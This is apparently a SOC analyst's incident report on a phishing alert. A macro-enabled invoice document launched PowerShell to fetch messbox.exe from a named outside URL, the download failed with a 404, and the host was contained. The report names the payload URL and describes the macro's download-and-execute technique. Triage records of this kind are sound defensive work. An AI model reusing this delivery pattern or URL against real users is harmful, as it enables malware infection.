T1566 Phishing T1204 User Execution T1059.001 PowerShell T1105 Ingress Tool Transfer
User Jayne on host 172.16.17.198 opened malicious attachment edit1-invoice.docm sent from jake.admin@cybercommunity.info
Macro executed via InkEdit1_GotFocus which launched cmd.exe and PowerShell to download messbox.exe from http://www.greyhathacker.net/tools/messbox.exe and save as mess.exe
Feb 28 2024 08:42 AM
File located in Downloads folder. Outbound HTTP GET request to http://www.greyhathacker.net/tools/messbox.exe from powershell.exe
Phishing email delivering macro enabled document to download and execute remote malware
olevba confirmed auto execution and PowerShell DownloadFile behavior. Network logs show HTTP 404 response so payload not retrieved. No evidence of successful execution. True Positive macro execution without second stage compromise
Action Host contained email removed file deleted and monitoring continued